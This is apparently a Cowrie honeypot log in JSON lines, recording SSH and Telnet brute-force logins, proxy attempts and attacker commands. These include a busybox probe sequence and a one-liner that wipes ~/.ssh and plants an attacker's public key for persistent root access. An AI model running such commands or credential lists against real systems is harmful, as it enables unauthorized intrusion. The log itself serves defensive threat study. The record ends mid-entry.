{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.55.88","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.55.88:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.183564Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"193.105.134.95","src_port":22944,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22944","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.315058Z","session":"8310517cb39a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.359728Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:26:15.404914Z","src_ip":"193.105.134.95","session":"8310517cb39a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35196,"dst_ip":"1.2.3.4","dst_port":23,"session":"0239cc158f24","protocol":"telnet","message":"New connection: 212.227.235.229:35196 (1.2.3.4:23) [session: 0239cc158f24]","sensor":"my-vps","timestamp":"2025-09-08T14:26:53.174388Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39442,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40e81a307d7","protocol":"ssh","message":"New connection: 212.227.235.229:39442 (1.2.3.4:22) [session: f40e81a307d7]","sensor":"my-vps","timestamp":"2025-09-08T14:26:58.105276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:26:58.106406Z","src_ip":"212.227.235.229","session":"f40e81a307d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:26:58.227567Z","src_ip":"212.227.235.229","session":"f40e81a307d7"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1234567","message":"login attempt [hadoop/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T14:26:58.753535Z","src_ip":"212.227.235.229","session":"f40e81a307d7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:26:59.876932Z","src_ip":"212.227.235.229","session":"f40e81a307d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54597,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0e50ccce067","protocol":"telnet","message":"New connection: 212.227.125.160:54597 (1.2.3.4:23) [session: a0e50ccce067]","sensor":"my-vps","timestamp":"2025-09-08T14:26:59.954611Z"}
{"eventid":"cowrie.session.closed","duration":13.085296869277954,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:27:06.259617Z","src_ip":"212.227.235.229","session":"0239cc158f24"}
{"eventid":"cowrie.session.closed","duration":31.339122772216797,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:27:31.293667Z","src_ip":"212.227.125.160","session":"a0e50ccce067"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38348,"dst_ip":"1.2.3.4","dst_port":23,"session":"f5c63d890414","protocol":"telnet","message":"New connection: 212.227.125.160:38348 (1.2.3.4:23) [session: f5c63d890414]","sensor":"my-vps","timestamp":"2025-09-08T14:27:36.348973Z"}
{"eventid":"cowrie.login.success","username":"root","password":"klv123","message":"login attempt [root/klv123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:27:36.818178Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:27:36.867023Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.051576Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.054243Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.054981Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.055840Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.056550Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.057510Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox RTIAJ","message":"CMD: cat /proc/mounts; /bin/busybox RTIAJ","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.203417Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox RTIAJ","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox RTIAJ","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.331751Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox RTIAJ","message":"CMD: tftp; wget; /bin/busybox RTIAJ","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.458121Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.643036Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.646562Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"/bin/busybox RTIAJ","message":"CMD: /bin/busybox RTIAJ","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.770922Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.784422Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.785670Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.786762Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d628cfaeaf37ae004a09a520826bd25f05ce806a7d51caea0d5a9603dc5954a2","size":3550,"shasum":"d628cfaeaf37ae004a09a520826bd25f05ce806a7d51caea0d5a9603dc5954a2","duplicate":false,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/d628cfaeaf37ae004a09a520826bd25f05ce806a7d51caea0d5a9603dc5954a2 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.788397Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.session.closed","duration":1.4435153007507324,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:27:37.792410Z","src_ip":"212.227.125.160","session":"f5c63d890414"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59454,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5ad8772cf79","protocol":"ssh","message":"New connection: 212.227.235.229:59454 (1.2.3.4:22) [session: c5ad8772cf79]","sensor":"my-vps","timestamp":"2025-09-08T14:28:10.554324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:28:10.555303Z","src_ip":"212.227.235.229","session":"c5ad8772cf79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:28:10.675123Z","src_ip":"212.227.235.229","session":"c5ad8772cf79"}
{"eventid":"cowrie.login.failed","username":"db2fenc1","password":"db2fenc1","message":"login attempt [db2fenc1/db2fenc1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:28:11.196015Z","src_ip":"212.227.235.229","session":"c5ad8772cf79"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:28:12.317712Z","src_ip":"212.227.235.229","session":"c5ad8772cf79"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58506,"dst_ip":"1.2.3.4","dst_port":22,"session":"a463a79fd69c","protocol":"ssh","message":"New connection: 217.72.205.35:58506 (1.2.3.4:22) [session: a463a79fd69c]","sensor":"my-vps","timestamp":"2025-09-08T14:28:24.253963Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:28:24.255172Z","src_ip":"217.72.205.35","session":"a463a79fd69c"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.143.51","src_port":60436,"dst_ip":"1.2.3.4","dst_port":22,"session":"95dc7293f26b","protocol":"ssh","message":"New connection: 101.126.143.51:60436 (1.2.3.4:22) [session: 95dc7293f26b]","sensor":"my-vps","timestamp":"2025-09-08T14:28:56.714857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:28:56.715571Z","src_ip":"101.126.143.51","session":"95dc7293f26b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T14:28:57.626346Z","src_ip":"101.126.143.51","session":"95dc7293f26b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39798,"dst_ip":"1.2.3.4","dst_port":23,"session":"71972a41057e","protocol":"telnet","message":"New connection: 212.227.125.160:39798 (1.2.3.4:23) [session: 71972a41057e]","sensor":"my-vps","timestamp":"2025-09-08T14:29:04.992366Z"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:29:06.965433Z","src_ip":"101.126.143.51","session":"95dc7293f26b"}
{"eventid":"cowrie.session.closed","duration":7.839518070220947,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:29:12.831818Z","src_ip":"212.227.125.160","session":"71972a41057e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46294,"dst_ip":"1.2.3.4","dst_port":22,"session":"4703d84ef919","protocol":"ssh","message":"New connection: 212.227.235.229:46294 (1.2.3.4:22) [session: 4703d84ef919]","sensor":"my-vps","timestamp":"2025-09-08T14:29:24.432980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:29:24.433925Z","src_ip":"212.227.235.229","session":"4703d84ef919"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:29:24.554329Z","src_ip":"212.227.235.229","session":"4703d84ef919"}
{"eventid":"cowrie.login.failed","username":"data","password":"2025","message":"login attempt [data/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T14:29:25.077143Z","src_ip":"212.227.235.229","session":"4703d84ef919"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:29:26.200056Z","src_ip":"212.227.235.229","session":"4703d84ef919"}
{"eventid":"cowrie.session.connect","src_ip":"61.77.88.90","src_port":40713,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d4bbd305009","protocol":"telnet","message":"New connection: 61.77.88.90:40713 (1.2.3.4:23) [session: 8d4bbd305009]","sensor":"my-vps","timestamp":"2025-09-08T14:30:31.353377Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49780,"dst_ip":"1.2.3.4","dst_port":22,"session":"89ef15a2fe3c","protocol":"ssh","message":"New connection: 212.227.235.229:49780 (1.2.3.4:22) [session: 89ef15a2fe3c]","sensor":"my-vps","timestamp":"2025-09-08T14:30:32.636230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:30:32.637168Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:30:32.756452Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.login.success","username":"root","password":"filip","message":"login attempt [root/filip] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:30:33.276836Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:30:33.564073Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:30:33.564716Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:30:33.565751Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:30:33.686570Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:30:33.941948Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:30:33.942847Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.064715Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.065654Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49790,"dst_ip":"1.2.3.4","dst_port":22,"session":"717f048054bb","protocol":"ssh","message":"New connection: 212.227.235.229:49790 (1.2.3.4:22) [session: 717f048054bb]","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.181281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.182491Z","src_ip":"212.227.235.229","session":"717f048054bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 